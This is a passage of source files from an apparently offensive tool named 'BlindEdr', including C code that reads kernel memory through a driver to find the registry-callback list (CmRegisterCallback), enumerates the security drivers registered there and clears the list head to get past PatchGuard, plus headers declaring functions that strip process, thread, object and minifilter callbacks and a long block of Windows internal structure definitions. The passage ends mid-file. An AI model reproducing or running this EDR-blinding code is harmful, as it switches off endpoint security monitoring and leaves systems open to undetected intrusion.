PRINT("\n----------------------------------------------------\n"); 149 | PRINT("Register driver for ObRegisterCallbacks callback:\n"); 150 | PRINT("----------------------------------------------------\n\n"); 151 | 152 | // Process each object type 153 | for (int i = 0; i < sizeof(objects) / sizeof(objects[0]); i++) { 154 | INT64 typeAddr = GetPsProcessAndProcessTypeAddr(objects[i].type); 155 | 156 | if (typeAddr) { 157 | RemoveObRegisterCallbacks(typeAddr, objects[i].type); 158 | } 159 | else { 160 | PRINT("Failed to obtain %s type address.\n", objects[i].name); 161 | } 162 | } 163 | 164 | PRINT("\n"); 165 | } -------------------------------------------------------------------------------- /BlindEdr/RegistryCallbackManager.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | 4 | #include "RemoveCallBacks.h" 5 | 6 | #include "stdio.h" 7 | 8 | #define CM_CALLBACK_FUNCTION_OFFSET 0x28 9 | 10 | VOID ClearCmRegistercallback() { 11 | 12 | UINT64 offset = 0; 13 | 14 | // Get CmUnRegisterCallback function address 15 | // INT64 CmUnRegisterCallbackAddr = GetFuncAddress((CHAR*)"ntoskrnl.exe", (CHAR*)"CmUnRegisterCallback"); 16 | INT64 CmUnRegisterCallbackAddr = GetFuncAddressH(NTOSKRNLEXE_CH, CmUnRegisterCallback_CH); 17 | if (CmUnRegisterCallbackAddr == 0) return; 18 | 19 | UINT64 patternAddr = FindPattern(CmUnRegisterCallbackAddr, &PREDEFINED_PATTERNS[5], 300); 20 | if (!patternAddr) { 21 | PRINT("Failed to locate CmUnRegisterCallback pattern\n"); 22 | return; 23 | } 24 | 25 | PRINT("----------------------------------------------------\n"); 26 | PRINT("Register the CmRegisterCallback callback driver: \n----------------------------------------------------\n\n[Clear all below]\n"); 27 | 28 | // Calculate instruction offset 29 | offset = CalculateOffset(patternAddr, 2, 6); 30 | 31 | // Get callback list head pointer 32 | INT64 CallbackListHead = patternAddr + offset + 7; 33 | 34 | // Read list head pointers 35 | INT64 Flink = 0; 36 | DriverMemoryOperation((VOID*)CallbackListHead, &Flink, 8, MEMORY_WRITE); 37 | INT64 Blink = 0; 38 | DriverMemoryOperation((VOID*)(CallbackListHead + 8), &Blink, 8, MEMORY_WRITE); 39 | 40 | // This is actually just to output what drivers have registered with the Register callback function. 41 | // In practical situations, this loop function can be commented out [43-69] 42 | // Count callback nodes 43 | INT Count = 1; 44 | INT64 tFlink = Flink; 45 | do { 46 | Count++; 47 | INT64 temp = 0; 48 | DriverMemoryOperation((VOID*)(tFlink), &temp, 8, MEMORY_WRITE); 49 | tFlink = temp; 50 | } while (tFlink != Blink); 51 | 52 | // Due to the PatchGuard protection of this kernel memory location, it cannot be replaced by passing an empty array. 53 | // Only the header of the doubly linked list can be modified to bypass PatchGuard. 54 | for (INT i = 0; i < Count; i++) { 55 | // Read callback function 56 | INT64 EDRFunction = 0; 57 | DriverMemoryOperation((VOID*)(Flink + CM_CALLBACK_FUNCTION_OFFSET), &EDRFunction, 8, MEMORY_WRITE); 58 | 59 | // Get driver name and check EDR status 60 | CHAR* DriverName = GetDriverName(EDRFunction); 61 | if (DriverName != NULL) { 62 | PRINT("%s\n", DriverName); 63 | } 64 | 65 | // Move to next node 66 | INT64 temp = 0; 67 | DriverMemoryOperation((VOID*)(Flink), &temp, 8, MEMORY_WRITE); 68 | Flink = temp; 69 | } 70 | 71 | // Clear callback list head 72 | DriverMemoryOperation(&CallbackListHead, (VOID*)CallbackListHead, 8, MEMORY_WRITE); 73 | } -------------------------------------------------------------------------------- /BlindEdr/RemoveCallBacks.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Common.h" 4 | #include "Structs.h" 5 | 6 | // Object type definitions for process and thread 7 | typedef enum _PS_OBJECT_TYPE { 8 | PsProcessType = 1, // Process object type 9 | PsThreadType = 2 // Thread object type 10 | } PS_OBJECT_TYPE; 11 | 12 | 13 | INT64 GetPspNotifyRoutineArrayH(UINT32 KernelCallbackRegFuncHash); 14 | 15 | INT64 GetPsProcessAndProcessTypeAddr(PS_OBJECT_TYPE objectType); 16 | 17 | 18 | VOID PrintAndClearCallBack(INT64 PspNotifyRoutineAddress, CHAR* CallBackRegFunc); 19 | VOID PrintAndClearCallBack(INT64 PspNotifyRoutineAddress, UINT32 CallBackRegFuncHash); 20 | 21 | 22 | VOID RemoveObRegisterCallbacks(INT64 PsProcessTypeAddr, PS_OBJECT_TYPE objectType); 23 | 24 | VOID RemoveInstanceCallback(INT64 FLT_FILTERAddr); 25 | 26 | VOID ClearThreeCallBack(); 27 | VOID ClearMiniFilterCallBack(INT64 FltEnumerateFiltersAddr); 28 | 29 | 30 | VOID ClearCmRegistercallback(); 31 | VOID ClearObRegisterCallbacks(); 32 | -------------------------------------------------------------------------------- /BlindEdr/Structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef _STRUCTS_H 4 | #define _STRUCTS_H 5 | 6 | #include 7 | 8 | #define STRUCTS_H 9 | 10 | typedef struct Sysinfo { 11 | DWORD dwMajor; 12 | DWORD dwMinorVersion; 13 | DWORD dwBuild; 14 | } Sysinfo, * pSysinfo; 15 | 16 | typedef struct _RTL_PROCESS_MODULE_INFORMATION 17 | { 18 | HANDLE Section; 19 | PVOID MappedBase; 20 | PVOID ImageBase; 21 | ULONG ImageSize; 22 | ULONG Flags; 23 | USHORT LoadOrderIndex; 24 | USHORT InitOrderIndex; 25 | USHORT LoadCount; 26 | USHORT OffsetToFileName; 27 | UCHAR FullPathName[256]; 28 | } RTL_PROCESS_MODULE_INFORMATION; 29 | 30 | typedef struct _RTL_PROCESS_MODULES 31 | { 32 | ULONG NumberOfModules; 33 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 34 | } RTL_PROCESS_MODULES, * PRTL_PROCESS_MODULES; 35 | 36 | 37 | 38 | typedef struct _MemOp { 39 | void* SourceAddress; 40 | void* DestinationAddress; 41 | size_t Size; 42 | } MemOp, * PMemOp; 43 | 44 | 45 | 46 | typedef struct _MemoryPatch { 47 | PVOID pAddr; 48 | UINT64 szData; 49 | PCHAR pData; 50 | struct _MemoryPatch* pNext; 51 | } MemoryPatch, * PMemoryPatch; 52 | 53 | typedef enum _MEMORY_OPERATION { 54 | MEMORY_WRITE, 55 | MEMORY_RESTORE 56 | } MEMORY_OPERATION; 57 | 58 | typedef void(__stdcall* NTPROC)(DWORD*, DWORD*, DWORD*); 59 | 60 | 61 | typedef struct _DRIVER_CONTEXT_ { 62 | PMemoryPatch PatchTable; 63 | Sysinfo Systeminfo; 64 | HANDLE hDevice; 65 | } Basic_INFO, * PBasic_INFO; 66 | 67 | 68 | 69 | #define NtCurrentThread() ((HANDLE)(LONG_PTR)-2) 70 | #define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1) 71 | #define NT_SUCCESS(STATUS) (((NTSTATUS)(STATUS)) >= 0) 72 | 73 | typedef struct _LSA_UNICODE_STRING { 74 | USHORT Length; 75 | USHORT MaximumLength; 76 | PWSTR Buffer; 77 | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR; 78 | 79 | 80 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 81 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 82 | (p)->RootDirectory = r; \ 83 | (p)->Attributes = a; \ 84 | (p)->ObjectName = n; \ 85 | (p)->SecurityDescriptor = s; \ 86 | (p)->SecurityQualityOfService = NULL; \ 87 | } 88 | 89 | #define OBJ_INHERIT 0x00000002L 90 | #define OBJ_PERMANENT 0x00000010L 91 | #define OBJ_EXCLUSIVE 0x00000020L 92 | #define OBJ_CASE_INSENSITIVE 0x00000040L 93 | #define OBJ_OPENIF 0x00000080L 94 | #define OBJ_OPENLINK 0x00000100L 95 | #define OBJ_KERNEL_HANDLE 0x00000200L 96 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400L 97 | #define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800L 98 | #define OBJ_DONT_REPARSE 0x00001000L 99 | #define OBJ_VALID_ATTRIBUTES 0x00001FF2L 100 | 101 | typedef enum _SECTION_INHERIT { 102 | ViewShare = 1, 103 | ViewUnmap = 2 104 | } SECTION_INHERIT, * PSECTION_INHERIT; 105 | 106 | typedef struct _LDR_MODULE { 107 | LIST_ENTRY InLoadOrderModuleList; 108 | LIST_ENTRY InMemoryOrderModuleList; 109 | LIST_ENTRY InInitializationOrderModuleList; 110 | PVOID BaseAddress; 111 | PVOID EntryPoint; 112 | ULONG SizeOfImage; 113 | UNICODE_STRING FullDllName; 114 | UNICODE_STRING BaseDllName; 115 | ULONG Flags; 116 | SHORT LoadCount; 117 | SHORT TlsIndex; 118 | LIST_ENTRY HashTableEntry; 119 | ULONG TimeDateStamp; 120 | } LDR_MODULE, * PLDR_MODULE; 121 | 122 | typedef struct _PEB_LDR_DATA { 123 | ULONG Length; 124 | ULONG Initialized; 125 | PVOID SsHandle; 126 | LIST_ENTRY InLoadOrderModuleList; 127 | LIST_ENTRY InMemoryOrderModuleList; 128 | LIST_ENTRY InInitializationOrderModuleList; 129 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 130 | 131 | typedef struct _PEB { 132 | BOOLEAN InheritedAddressSpace; 133 | BOOLEAN ReadImageFileExecOptions; 134 | BOOLEAN BeingDebugged; 135 | BOOLEAN Spare; 136 | HANDLE Mutant; 137 | PVOID ImageBase; 138 | PPEB_LDR_DATA LoaderData; 139 | PVOID ProcessParameters; 140 | PVOID SubSystemData; 141 | PVOID ProcessHeap; 142 | PVOID FastPebLock; 143 | PVOID FastPebLockRoutine; 144 | PVOID FastPebUnlockRoutine; 145 | ULONG EnvironmentUpdateCount; 146 | PVOID* KernelCallbackTable; 147 | PVOID EventLogSection; 148 | PVOID EventLog; 149 | PVOID FreeList; 150 | ULONG TlsExpansionCounter; 151 | PVOID TlsBitmap; 152 | ULONG TlsBitmapBits[0x2]; 153 | PVOID ReadOnlySharedMemoryBase; 154 | PVOID ReadOnlySharedMemoryHeap; 155 | PVOID* ReadOnlyStaticServerData; 156 | PVOID AnsiCodePageData; 157 | PVOID OemCodePageData; 158 | PVOID UnicodeCaseTableData; 159 | ULONG NumberOfProcessors; 160 | ULONG NtGlobalFlag; 161 | BYTE Spare2[0x4]; 162 | LARGE_INTEGER CriticalSectionTimeout; 163 | ULONG HeapSegmentReserve; 164 | ULONG HeapSegmentCommit; 165 | ULONG HeapDeCommitTotalFreeThreshold; 166 | ULONG HeapDeCommitFreeBlockThreshold; 167 | ULONG NumberOfHeaps; 168 | ULONG MaximumNumberOfHeaps; 169 | PVOID** ProcessHeaps; 170 | PVOID GdiSharedHandleTable; 171 | PVOID ProcessStarterHelper; 172 | PVOID GdiDCAttributeList; 173 | PVOID LoaderLock; 174 | ULONG OSMajorVersion; 175 | ULONG OSMinorVersion; 176 | ULONG OSBuildNumber; 177 | ULONG OSPlatformId; 178 | ULONG ImageSubSystem; 179 | ULONG ImageSubSystemMajorVersion; 180 | ULONG ImageSubSystemMinorVersion; 181 | ULONG GdiHandleBuffer[0x22]; 182 | ULONG PostProcessInitRoutine; 183 | ULONG TlsExpansionBitmap; 184 | BYTE TlsExpansionBitmapBits[0x80]; 185 | ULONG SessionId; 186 | } PEB, * PPEB; 187 | 188 | typedef struct __CLIENT_ID { 189 | HANDLE UniqueProcess; 190 | HANDLE UniqueThread; 191 | } CLIENT_ID, * PCLIENT_ID; 192 | 193 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 194 | ULONG Flags; 195 | PCHAR FrameName; 196 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT; 197 | 198 | typedef struct _TEB_ACTIVE_FRAME { 199 | ULONG Flags; 200 | struct _TEB_ACTIVE_FRAME* Previous; 201 | PTEB_ACTIVE_FRAME_CONTEXT Context; 202 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME; 203 | 204 | typedef struct _GDI_TEB_BATCH { 205 | ULONG Offset; 206 | ULONG HDC; 207 | ULONG Buffer[310]; 208 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH; 209 | 210 | typedef PVOID PACTIVATION_CONTEXT; 211 | 212 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { 213 | struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous; 214 | PACTIVATION_CONTEXT ActivationContext; 215 | ULONG Flags; 216 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME; 217 | 218 | typedef struct _ACTIVATION_CONTEXT_STACK { 219 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame; 220 | LIST_ENTRY FrameListCache; 221 | ULONG Flags; 222 | ULONG NextCookieSequenceNumber; 223 | ULONG StackId; 224 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK; 225 | 226 | typedef struct _TEB { 227 | NT_TIB NtTib; 228 | PVOID EnvironmentPointer; 229 | CLIENT_ID ClientId; 230 | PVOID ActiveRpcHandle; 231 | PVOID ThreadLocalStoragePointer; 232 | PPEB ProcessEnvironmentBlock; 233 | ULONG LastErrorValue; 234 | ULONG CountOfOwnedCriticalSections; 235 | PVOID CsrClientThread; 236 | PVOID Win32ThreadInfo; 237 | ULONG User32Reserved[26]; 238 | ULONG UserReserved[5]; 239 | PVOID WOW32Reserved; 240 | LCID CurrentLocale; 241 | ULONG FpSoftwareStatusRegister; 242 | PVOID SystemReserved1[54]; 243 | LONG ExceptionCode; 244 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 245 | PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer; 246 | UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)]; 247 | ULONG TxFsContext; 248 | #elif (NTDDI_VERSION >= NTDDI_WS03) 249 | PACTIVATION_CONTEXT_STACK ActivationContextStackPointer; 250 | UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)]; 251 | #else 252 | ACTIVATION_CONTEXT_STACK ActivationContextStack; 253 | UCHAR SpareBytes1[24]; 254 | #endif 255 | GDI_TEB_BATCH GdiTebBatch; 256 | CLIENT_ID RealClientId; 257 | PVOID GdiCachedProcessHandle; 258 | ULONG GdiClientPID; 259 | ULONG GdiClientTID; 260 | PVOID GdiThreadLocalInfo; 261 | PSIZE_T Win32ClientInfo[62]; 262 | PVOID glDispatchTable[233]; 263 | PSIZE_T glReserved1[29]; 264 | PVOID glReserved2; 265 | PVOID glSectionInfo; 266 | PVOID glSection; 267 | PVOID glTable; 268 | PVOID glCurrentRC; 269 | PVOID glContext; 270 | NTSTATUS LastStatusValue; 271 | UNICODE_STRING StaticUnicodeString; 272 | WCHAR StaticUnicodeBuffer[261]; 273 | PVOID DeallocationStack; 274 | PVOID TlsSlots[64]; 275 | LIST_ENTRY TlsLinks; 276 | PVOID Vdm; 277 | PVOID ReservedForNtRpc; 278 | PVOID DbgSsReserved[2]; 279 | #if (NTDDI_VERSION >= NTDDI_WS03) 280 | ULONG HardErrorMode; 281 | #else 282 | ULONG HardErrorsAreDisabled; 283 | #endif 284 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 285 | PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)]; 286 | GUID ActivityId; 287 | PVOID SubProcessTag; 288 | PVOID EtwLocalData; 289 | PVOID EtwTraceData; 290 | #elif (NTDDI_VERSION >= NTDDI_WS03) 291 | PVOID Instrumentation[14]; 292 | PVOID SubProcessTag; 293 | PVOID EtwLocalData; 294 | #else 295 | PVOID Instrumentation[16]; 296 | #endif 297 | PVOID WinSockData; 298 | ULONG GdiBatchCount; 299 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 300 | BOOLEAN SpareBool0; 301 | BOOLEAN SpareBool1; 302 | BOOLEAN SpareBool2; 303 | #else 304 | BOOLEAN InDbgPrint; 305 | BOOLEAN FreeStackOnTermination; 306 | BOOLEAN HasFiberData; 307 | #endif 308 | UCHAR IdealProcessor; 309 | #if (NTDDI_VERSION >= NTDDI_WS03) 310 | ULONG GuaranteedStackBytes; 311 | #else 312 | ULONG Spare3; 313 | #endif 314 | PVOID ReservedForPerf; 315 | PVOID ReservedForOle; 316 | ULONG WaitingOnLoaderLock; 317 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 318 | PVOID SavedPriorityState; 319 | ULONG_PTR SoftPatchPtr1; 320 | ULONG_PTR ThreadPoolData; 321 | #elif (NTDDI_VERSION >= NTDDI_WS03) 322 | ULONG_PTR SparePointer1; 323 | ULONG_PTR SoftPatchPtr1; 324 | ULONG_PTR SoftPatchPtr2; 325 | #else 326 | Wx86ThreadState Wx86Thread; 327 | #endif 328 | PVOID* TlsExpansionSlots; 329 | #if defined(_WIN64) && !defined(EXPLICIT_32BIT) 330 | PVOID DeallocationBStore; 331 | PVOID BStoreLimit; 332 | #endif 333 | ULONG ImpersonationLocale; 334 | ULONG IsImpersonating; 335 | PVOID NlsCache; 336 | PVOID pShimData; 337 | ULONG HeapVirtualAffinity; 338 | HANDLE CurrentTransactionHandle; 339 | PTEB_ACTIVE_FRAME ActiveFrame; 340 | #if (NTDDI_VERSION >= NTDDI_WS03) 341 | PVOID FlsData; 342 | #endif 343 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 344 | PVOID PreferredLangauges; 345 | PVOID UserPrefLanguages; 346 | PVOID MergedPrefLanguages; 347 | ULONG MuiImpersonation; 348 | union 349 | { 350 | struct 351 | { 352 | USHORT SpareCrossTebFlags : 16; 353 | }; 354 | USHORT CrossTebFlags; 355 | }; 356 | union 357 | { 358 | struct 359 | { 360 | USHORT DbgSafeThunkCall : 1; 361 | USHORT DbgInDebugPrint : 1; 362 | USHORT DbgHasFiberData : 1; 363 | USHORT DbgSkipThreadAttach : 1; 364 | USHORT DbgWerInShipAssertCode : 1; 365 | USHORT DbgIssuedInitialBp : 1; 366 | USHORT DbgClonedThread : 1; 367 | USHORT SpareSameTebBits : 9; 368 | }; 369 | USHORT SameTebFlags; 370 | }; 371 | PVOID TxnScopeEntercallback; 372 | PVOID TxnScopeExitCAllback; 373 | PVOID TxnScopeContext; 374 | ULONG LockCount; 375 | ULONG ProcessRundown; 376 | ULONG64 LastSwitchTime; 377 | ULONG64 TotalSwitchOutTime; 378 | LARGE_INTEGER WaitReasonBitMap; 379 | #else 380 | BOOLEAN SafeThunkCall; 381 | BOOLEAN BooleanSpare[3]; 382 | #endif 383 | } TEB, * PTEB; 384 | 385 | typedef struct _LDR_DATA_TABLE_ENTRY { 386 | LIST_ENTRY InLoadOrderLinks; 387 | LIST_ENTRY InMemoryOrderLinks; 388 | LIST_ENTRY InInitializationOrderLinks; 389 | PVOID DllBase; 390 | PVOID EntryPoint; 391 | ULONG SizeOfImage; 392 | UNICODE_STRING FullDllName; 393 | UNICODE_STRING BaseDllName; 394 | ULONG Flags; 395 | WORD LoadCount; 396 | WORD TlsIndex; 397 | union { 398 | LIST_ENTRY HashLinks; 399 | struct { 400 | PVOID SectionPointer; 401 | ULONG CheckSum; 402 | }; 403 | }; 404 | union { 405 | ULONG TimeDateStamp; 406 | PVOID LoadedImports; 407 | }; 408 | PACTIVATION_CONTEXT EntryPointActivationContext; 409 | PVOID PatchInformation; 410 | LIST_ENTRY ForwarderLinks; 411 | LIST_ENTRY ServiceTagLinks; 412 | LIST_ENTRY StaticLinks; 413 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 414 | 415 | 416 | typedef struct _INITIAL_TEB { 417 | PVOID StackBase; 418 | PVOID StackLimit; 419 | PVOID StackCommit; 420 | PVOID StackCommitMax; 421 | PVOID StackReserved; 422 | } INITIAL_TEB, * PINITIAL_TEB; 423 | 424 | typedef struct _OBJECT_ATTRIBUTES { 425 | ULONG Length; 426 | HANDLE RootDirectory; 427 | PUNICODE_STRING ObjectName; 428 | ULONG Attributes; 429 | PVOID SecurityDescriptor; 430 | PVOID SecurityQualityOfService; 431 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 432 | 433 | 434 | 435 | #define RTL_MAX_DRIVE_LETTERS 32 436 | 437 | 438 | 439 | typedef struct _RTL_DRIVE_LETTER_CURDIR 440 | { 441 | USHORT Flags; 442 | USHORT Length; 443 | ULONG TimeStamp; 444 | UNICODE_STRING DosPath; 445 | 446 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 447 | 448 | typedef struct _CURDIR 449 | { 450 | UNICODE_STRING DosPath; 451 | HANDLE Handle; 452 | 453 | } CURDIR, * PCURDIR; 454 | 455 | 456 | typedef struct _RTL_USER_PROCESS_PARAMETERS 457 | { 458 | ULONG MaximumLength; 459 | ULONG Length; 460 | 461 | ULONG Flags; 462 | ULONG DebugFlags; 463 | 464 | HANDLE ConsoleHandle; 465 | ULONG ConsoleFlags; 466 | HANDLE StandardInput; 467 | HANDLE StandardOutput; 468 | HANDLE StandardError; 469 | 470 | CURDIR CurrentDirectory; 471 | UNICODE_STRING DllPath; 472 | UNICODE_STRING ImagePathName; 473 | UNICODE_STRING CommandLine; 474 | PWCHAR Environment; 475 | 476 | ULONG StartingX; 477 | ULONG StartingY; 478 | ULONG CountX; 479 | ULONG CountY; 480 | ULONG CountCharsX; 481 | ULONG CountCharsY; 482 | ULONG FillAttribute; 483 | 484 | ULONG WindowFlags; 485 | ULONG ShowWindowFlags; 486 | UNICODE_STRING WindowTitle; 487 | UNICODE_STRING DesktopInfo; 488 | UNICODE_STRING ShellInfo; 489 | UNICODE_STRING RuntimeData; 490 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 491 | 492 | ULONG_PTR EnvironmentSize; 493 | ULONG_PTR EnvironmentVersion; 494 | PVOID PackageDependencyData; 495 | ULONG ProcessGroupId; 496 | ULONG LoaderThreads; 497 | 498 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 499 | 500 | 501 | 502 | 503 | typedef enum _PS_CREATE_STATE 504 | { 505 | PsCreateInitialState, 506 | PsCreateFailOnFileOpen, 507 | PsCreateFailOnSectionCreate, 508 | PsCreateFailExeFormat, 509 | PsCreateFailMachineMismatch, 510 | PsCreateFailExeName, 511 | PsCreateSuccess, 512 | PsCreateMaximumStates 513 | 514 | } PS_CREATE_STATE; 515 | 516 | typedef struct _PS_CREATE_INFO 517 | { 518 | SIZE_T Size; 519 | PS_CREATE_STATE State; 520 | union 521 | { 522 | struct 523 | { 524 | union 525 | { 526 | ULONG InitFlags; 527 | struct 528 | { 529 | UCHAR WriteOutputOnExit : 1; 530 | UCHAR DetectManifest : 1; 531 | UCHAR IFEOSkipDebugger : 1; 532 | UCHAR IFEODoNotPropagateKeyState : 1; 533 | UCHAR SpareBits1 : 4; 534 | UCHAR SpareBits2 : 8; 535 | USHORT ProhibitedImageCharacteristics : 16; 536 | } s1; 537 | } u1; 538 | ACCESS_MASK AdditionalFileAccess; 539 | } InitState; 540 | 541 | struct 542 | { 543 | HANDLE FileHandle; 544 | } FailSection; 545 | 546 | struct 547 | { 548 | USHORT DllCharacteristics; 549 | } ExeFormat; 550 | 551 | struct 552 | { 553 | HANDLE IFEOKey; 554 | } ExeName; 555 | 556 | struct 557 | { 558 | union 559 | { 560 | ULONG OutputFlags; 561 | struct 562 | { 563 | UCHAR ProtectedProcess : 1; 564 | UCHAR AddressSpaceOverride : 1; 565 | UCHAR DevOverrideEnabled : 1; 566 | UCHAR ManifestDetected : 1; 567 | UCHAR ProtectedProcessLight : 1; 568 | UCHAR SpareBits1 : 3; 569 | UCHAR SpareBits2 : 8; 570 | USHORT SpareBits3 : 16; 571 | } s2; 572 | } u2; 573 | HANDLE FileHandle; 574 | HANDLE SectionHandle; 575 | ULONGLONG UserProcessParametersNative; 576 | ULONG UserProcessParametersWow64; 577 | ULONG CurrentParameterFlags; 578 | ULONGLONG PebAddressNative; 579 | ULONG PebAddressWow64; 580 | ULONGLONG ManifestAddress; 581 | ULONG ManifestSize; 582 | } SuccessState; 583 | }; 584 | 585 | } PS_CREATE_INFO, * PPS_CREATE_INFO; 586 | 587 | 588 | 589 | typedef struct _PS_ATTRIBUTE 590 | { 591 | ULONG_PTR Attribute; 592 | SIZE_T Size; 593 | union 594 | { 595 | ULONG_PTR Value; 596 | PVOID ValuePtr; 597 | }; 598 | PSIZE_T ReturnLength; 599 | 600 | } PS_ATTRIBUTE, * PPS_ATTRIBUTE; 601 | 602 | 603 | 604 | typedef struct _PS_ATTRIBUTE_LIST 605 | { 606 | SIZE_T TotalLength; 607 | PS_ATTRIBUTE Attributes[3]; 608 | 609 | } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; 610 | 611 | 612 | 613 | 614 | #define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff 615 | #define PS_ATTRIBUTE_THREAD 0x00010000 // Attribute may be used with thread creation 616 | #define PS_ATTRIBUTE_INPUT 0x00020000 // Attribute is input only 617 | #define PS_ATTRIBUTE_ADDITIVE 0x00040000 // Attribute may be "accumulated", e.g. bitmasks, counters, etc. 618 | 619 | typedef enum _PS_ATTRIBUTE_NUM 620 | { 621 | PsAttributeParentProcess, // in HANDLE 622 | PsAttributeDebugPort, // in HANDLE 623 | PsAttributeToken, // in HANDLE 624 | PsAttributeClientId, // out PCLIENT_ID 625 | PsAttributeTebAddress, // out PTEB 626 | PsAttributeImageName, // in PWSTR 627 | PsAttributeImageInfo, // out PSECTION_IMAGE_INFORMATION 628 | PsAttributeMemoryReserve, // in PPS_MEMORY_RESERVE 629 | PsAttributePriorityClass, // in UCHAR 630 | PsAttributeErrorMode, // in ULONG 631 | PsAttributeStdHandleInfo, // in PPS_STD_HANDLE_INFO 632 | PsAttributeHandleList, // in PHANDLE 633 | PsAttributeGroupAffinity, // in PGROUP_AFFINITY 634 | PsAttributePreferredNode, // in PUSHORT 635 | PsAttributeIdealProcessor, // in PPROCESSOR_NUMBER 636 | PsAttributeUmsThread, // see MSDN UpdateProceThreadAttributeList (CreateProcessW) - in PUMS_CREATE_THREAD_ATTRIBUTES 637 | PsAttributeMitigationOptions, // in UCHAR 638 | PsAttributeProtectionLevel, // in ULONG 639 | PsAttributeSecureProcess, // since THRESHOLD (Virtual Secure Mode, Device Guard) 640 | PsAttributeJobList, 641 | PsAttributeChildProcessPolicy, // since THRESHOLD2 642 | PsAttributeAllApplicationPackagesPolicy, // since REDSTONE 643 | PsAttributeWin32kFilter, 644 | PsAttributeSafeOpenPromptOriginClaim, 645 | PsAttributeBnoIsolation, 646 | PsAttributeDesktopAppPolicy, 647 | PsAttributeMax 648 | } PS_ATTRIBUTE_NUM; 649 | 650 | 651 | #define PsAttributeValue(Number, Thread, Input, Additive) \ 652 | (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \ 653 | ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \ 654 | ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \ 655 | ((Additive) ? PS_ATTRIBUTE_ADDITIVE : 0)) 656 | 657 | #define PS_ATTRIBUTE_PARENT_PROCESS \ 658 | PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE) 659 | #define PS_ATTRIBUTE_DEBUG_PORT \ 660 | PsAttributeValue(PsAttributeDebugPort, FALSE, TRUE, TRUE) 661 | #define PS_ATTRIBUTE_TOKEN \ 662 | PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE) 663 | #define PS_ATTRIBUTE_CLIENT_ID \ 664 | PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE) 665 | #define PS_ATTRIBUTE_TEB_ADDRESS \ 666 | PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE) 667 | #define PS_ATTRIBUTE_IMAGE_NAME \ 668 | PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE) 669 | #define PS_ATTRIBUTE_IMAGE_INFO \ 670 | PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE) 671 | #define PS_ATTRIBUTE_MEMORY_RESERVE \ 672 | PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE) 673 | #define PS_ATTRIBUTE_PRIORITY_CLASS \ 674 | PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE) 675 | #define PS_ATTRIBUTE_ERROR_MODE \ 676 | PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE) 677 | #define PS_ATTRIBUTE_STD_HANDLE_INFO \ 678 | PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE) 679 | #define PS_ATTRIBUTE_HANDLE_LIST \ 680 | PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE) 681 | #define PS_ATTRIBUTE_GROUP_AFFINITY \ 682 | PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE) 683 | #define PS_ATTRIBUTE_PREFERRED_NODE \ 684 | PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE) 685 | #define PS_ATTRIBUTE_IDEAL_PROCESSOR \ 686 | PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE) 687 | #define PS_ATTRIBUTE_MITIGATION_OPTIONS \ 688 | PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, FALSE) 689 | #define PS_ATTRIBUTE_PROTECTION_LEVEL \ 690 | PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, FALSE) 691 | #define PS_ATTRIBUTE_UMS_THREAD \ 692 | PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE) 693 | #define PS_ATTRIBUTE_SECURE_PROCESS \ 694 | 